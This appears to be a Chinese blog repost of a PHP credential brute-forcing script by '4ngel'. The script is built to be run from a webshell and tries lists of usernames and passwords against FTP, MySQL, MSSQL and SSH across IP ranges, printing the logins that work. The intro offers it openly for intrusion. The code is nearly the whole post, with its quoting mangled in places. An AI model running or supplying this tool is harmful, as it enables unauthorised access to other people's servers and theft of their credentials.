博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
PHP扫FTP\MYSQL\MSSQL\SSH密码的脚本
阅读量:6325 次
发布时间:2019-06-22

本文共 8205 字,大约阅读时间需要 27 分钟。

可以扫FTPMYSQLMSSQLSSH密码

比如webshell在linux下。不会在LINUX下渗透。可以试试这个。

 

 
  1. <?php 
  2. @set_magic_quotes_runtime(0); 
  3. @set_time_limit(0); 
  4.  
  5. // 允许程序在 register_globals = off 的环境下工作 
  6. $onoff = function_exists(‘ini_get’) ? ini_get(‘register_globals’) : get_cfg_var(‘register_globals’); 
  7. if ($onoff != 1) { 
  8. @extract($_POST, EXTR_SKIP); 
  9. @extract($_GET, EXTR_SKIP); 
  10. function pr($a) { 
  11. echo ‘<pre>’; 
  12. print_r($a); 
  13. echo ‘</pre>’; 
  14.  
  15. session_start(); 
  16.  
  17. $type = in_array($_POST['type'], array(‘ftp’,'mysql’,'mssql’,'ssh’)) ? $_POST['type'] : ”; 
  18.  
  19. $_SESSION['type'] = $type
  20. $_SESSION['ftpport'] = $ftpport = $_POST['ftpport']; 
  21. $_SESSION['mysqlport'] = $mysqlport = $_POST['mysqlport']; 
  22. $_SESSION['mssqlport'] = $mssqlport = $_POST['mssqlport']; 
  23. $_SESSION['sshport'] = $mssqlport = $_POST['sshport']; 
  24. $_SESSION['hostlist'] = $hostlist = $_POST['hostlist']; 
  25. $_SESSION['userlist'] = $userlist = $_POST['userlist']; 
  26. $_SESSION['passlist'] = $passlist = $_POST['passlist']; 
  27.  
  28. ?> 
  29. <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“> 
  30. <html xmlns=”http://www.w3.org/1999/xhtml“> 
  31. <head> 
  32. <meta http-equiv=”Content-Type” content=”text/html; charset=gbk” /> 
  33. <title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title> 
  34. <style type=”text/css”> 
  35. body, div, td {font-size: 12px;font-family: Arial, sans-serif;color: #333;line-height: 16px;} 
  36. a{color:#833;text-decoration:none;} 
  37. a:hover{color:#147;text-decoration:underline;} 
  38. </style><!–{
    if $returnurl}–> 
  39. </head> 
  40.  
  41. <body> 
  42. <?php 
  43. if ($type && $hostlist && $userlist && isset($passlist)) { 
  44. $hostdb = explode(“n”, $hostlist); 
  45. $userdb = explode(“n”, $userlist); 
  46. $passdb = explode(“n”, $passlist); 
  47. echo ‘<p>’.$type.’ result</p><hr>’; 
  48. if ($type == ‘mysql’) { 
  49. !$mysqlport && $mysqlport = 3306; 
  50. foreach($hostdb as $host){ 
  51. $i=0; 
  52. if (strpos($host, ‘-’)) { 
  53. $host1 = explode(‘-’, $host); 
  54. $hoststart = explode(‘.’, $host1[0]); 
  55. $hostend = explode(‘.’, $host1[1]); 
  56.  
  57. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  58. foreach($userdb as $user) { 
  59. if ($user) { 
  60. foreach($passdb as $pass) { 
  61. !$pass && $pass=”; 
  62. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  63. if($link = @mysql_connect($h.’:’.$mysqlport$user$pass)) { 
  64. echo $h.’:’.$mysqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  65. @mysql_close($link); 
  66. break
  67. continue
  68. else { 
  69. foreach($userdb as $user) { 
  70. if ($user) { 
  71. foreach($passdb as $pass) { 
  72. !$pass && $pass=”; 
  73. if($link = mysql_connect($host.’:’.$mysqlport$user$pass)) { 
  74. echo $host.’:’.$mysqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  75. @mysql_close($link); 
  76. break
  77. elseif ($type == ‘ftp’) { 
  78. !$ftpport && $ftpport = 21; 
  79.  
  80. foreach($hostdb as $host){ 
  81. $i=0; 
  82. if (strpos($host, ‘-’)) { 
  83. $host1 = explode(‘-’, $host); 
  84. $hoststart = explode(‘.’, $host1[0]); 
  85. $hostend = explode(‘.’, $host1[1]); 
  86.  
  87. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  88. foreach($userdb as $user) { 
  89. if ($user) { 
  90. foreach($passdb as $pass) { 
  91. !$pass && $pass=”; 
  92. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  93. if ($conn_id = @ftp_connect($h$ftpport)) { 
  94. if (@ftp_login($conn_id$user$pass)) { 
  95. echo $h.’:’.$ftpport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  96. @ftp_close($conn_id); 
  97. break
  98. continue
  99. else { 
  100. foreach($userdb as $user) { 
  101. if ($user) { 
  102. foreach($passdb as $pass) { 
  103. !$pass && $pass=”; 
  104. if ($conn_id = @ftp_connect($host$ftpport)) { 
  105. if (@ftp_login($conn_id$user$pass)) { 
  106. echo $host.’:’.$ftpport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  107. @ftp_close($conn_id); 
  108. break
  109. elseif ($type == ‘mssql’) { 
  110. @ini_set(‘mssql.charset’, ‘UTF-8′); 
  111. @ini_set(‘mssql.textlimit’, 2147483647); 
  112. @ini_set(‘mssql.textsize’, 2147483647); 
  113. if (extension_loaded(‘mssql’)) { 
  114. foreach($hostdb as $host){ 
  115. $i=0; 
  116. if (strpos($host, ‘-’)) { 
  117. $host1 = explode(‘-’, $host); 
  118. $hoststart = explode(‘.’, $host1[0]); 
  119. $hostend = explode(‘.’, $host1[1]); 
  120.  
  121. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  122. foreach($userdb as $user) { 
  123. if ($user) { 
  124. foreach($passdb as $pass) { 
  125. !$pass && $pass=”; 
  126. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  127. if($link = @mssql_connect($h$user$pass, false)) { 
  128. echo $h.’:’.$mssqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  129. @mssql_close($link); 
  130. break
  131. continue
  132. else { 
  133. foreach($userdb as $user) { 
  134. if ($user) { 
  135. foreach($passdb as $pass) { 
  136. !$pass && $pass=”; 
  137. if($link = @mssql_connect($host$user$pass, false)) { 
  138. echo $host.’:’.$mssqlport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  139. @mssql_close($link); 
  140. break
  141. else { 
  142. echo ‘mssql extension is disable.’; 
  143. else { 
  144. if (function_exists(‘ssh2_connect’) && function_exists(‘ssh2_auth_password’)) { 
  145. !$sshport && $sshport = 22; 
  146.  
  147. foreach($hostdb as $host){ 
  148. $i=0; 
  149. if (strpos($host, ‘-’)) { 
  150. $host1 = explode(‘-’, $host); 
  151. $hoststart = explode(‘.’, $host1[0]); 
  152. $hostend = explode(‘.’, $host1[1]); 
  153.  
  154. for($i=$hoststart[3];$i<$hostend[3];$i++) { 
  155. foreach($userdb as $user) { 
  156. if ($user) { 
  157. foreach($passdb as $pass) { 
  158. !$pass && $pass=”; 
  159. $h = $hoststart[0].’.’.$hoststart[1].’.’.$hoststart[2].’.’.$i
  160. if ($conn_id = @ssh2_connect($h$sshport)) { 
  161. if (@ssh2_auth_password($conn_id$user$pass)) { 
  162. echo $h.’:’.$sshport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  163. break
  164. continue
  165. else { 
  166. foreach($userdb as $user) { 
  167. if ($user) { 
  168. foreach($passdb as $pass) { 
  169. !$pass && $pass=”; 
  170. if ($conn_id = @ssh2_connect($host$sshport)) { 
  171. if (@ssh2_auth_password($conn_id$user$pass)) { 
  172. echo $host.’:’.$sshport.’ / <span style=”color:#00f;”>’.$user.’</span> / <span style=”color:#f00;”>’.($pass ? $pass : ‘NULL’).’</span><br />’; 
  173. break
  174. else { 
  175. echo “function ssh2_connect doesn’t exist”; 
  176. echo ‘<p>Over…</p><hr>’; 
  177. ?> 
  178. <form id=”form1″ name=”form1″ method=”post” action=”"> 
  179. <table border=”0″ cellpadding=”0″ cellspacing=”5″> 
  180. <tr> 
  181. <td valign=”top”>项目</td> 
  182. <td><input type=”radio” name=”type” id=”ftp” value=”ftp” <?php if ($_SESSION['type'] == ‘ftp’) {
    echo ‘checked’;}?> /> 
  183. FTP 端口<input type=”text” size=”5″ name=”ftpport” id=”ftpport” value=”<?php if ($_SESSION['ftpport']) {
    echo $_SESSION['ftpport'];} else {
    echo ’21′;}?>” /><br /> 
  184. <input type=”radio” name=”type” id=”mysql” value=”mysql” <?php if ($_SESSION['type'] == ‘mysql’ || !$type) {
    echo ‘checked’;}?> /> 
  185. MYSQL 端口<input type=”text” size=”5″ name=”mysqlport” id=”mysqlport” value=”<?php if ($_SESSION['mysqlport']) {
    echo $_SESSION['mysqlport'];} else {
    echo ’3306′;}?>” /><br /> 
  186. <input type=”radio” name=”type” id=”mssql” value=”mssql” <?php if ($_SESSION['type'] == ‘mssql’) {
    echo ‘checked’;}?> /> 
  187. MSSQL 端口<input type=”text” size=”5″ name=”mssqlport” id=”mssqlport” value=”<?php if ($_SESSION['mssqlport']) {
    echo $_SESSION['mssqlport'];} else {
    echo ’1433′;}?>” /><br /> 
  188. <input type=”radio” name=”type” id=”ssh” value=”ssh” <?php if ($_SESSION['type'] == ‘ssh’) {
    echo ‘checked’;}?> /> 
  189. SSH 端口<input type=”text” size=”5″ name=”sshport” id=”sshport” value=”<?php if ($_SESSION['sshport']) {
    echo $_SESSION['sshport'];} else {
    echo ’22′;}?>” /></td> 
  190. </tr> 
  191. <tr> 
  192. <td valign=”top”>主机列表</td> 
  193. <td><textarea name=”hostlist” id=”hostlist” cols=”45″ rows=”5″><?php echo $_SESSION['hostlist'];?></textarea> 
  194. <br /> 
  195. 192.168.1.1-192.168.1.254<br /> 
  196. 或一行一个或一行一个段</td> 
  197. </tr> 
  198. <tr> 
  199. <td valign=”top”>用户名列表</td> 
  200. <td><textarea name=”userlist” id=”userlist” cols=”45″ rows=”5″><?php echo $_SESSION['userlist'];?></textarea> 
  201. <br /> 
  202. 一行一个</td> 
  203. </tr> 
  204. <tr> 
  205. <td valign=”top”>密码列表</td> 
  206. <td><textarea name=”passlist” id=”passlist” cols=”45″ rows=”5″><?php echo $_SESSION['passlist'];?></textarea> 
  207. <br /> 
  208. 一行一个</td> 
  209. </tr> 
  210. <tr> 
  211. <td>&nbsp;</td> 
  212. <td><input type=”submit” value=”提交” /></td> 
  213. </tr> 
  214. </table> 
  215. </form> 
  216. <hr /> 
  217. Codz by <a href=”http://www.sablog.net/blog”>4ngel</a><br /> 
  218. 2010-11-30 
  219. </body> 
  220. </html> 

 

本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/441308,如需转载请自行联系原作者

你可能感兴趣的文章
利用redis-sentinel+keepalived实现redis高可用
查看>>
代理服务器连接Internet,打开 excel2013时,会跳出需要连接网络的对话框
查看>>
Django学习系列之用户注册
查看>>
cdecl和stdcall调用约定的汇编代码对比
查看>>
RHEL 5服务篇—LAMP平台的部署及应用
查看>>
从优秀到卓越——反思应该如何创业
查看>>
Aperlib——Socket通讯模块压力及大数据对比工具
查看>>
Skype For Business2015 监控-存档服务器配置介绍
查看>>
密码学研究-数字签名
查看>>
linux中install命令基本用法
查看>>
技术分享连载(三十八)
查看>>
Lync Server 2010 安装部署系列二:域控制器安装
查看>>
WYSE *.ini常用写法以及ConfGen工具
查看>>
service初级:Activity与service间的联系、重写ServiceConnection
查看>>
深入浅出Linux设备驱动编程--内存与I/O操作
查看>>
烂泥:Domino与AD集成测试文档(二)
查看>>
Server 2008 R2 AD RMS完整部署:用户创建篇
查看>>
.NET设计模式(12):外观模式(Façade Pattern)
查看>>
深入解读Quartz的原理
查看>>
《0bug》一书获得重点推荐!
查看>>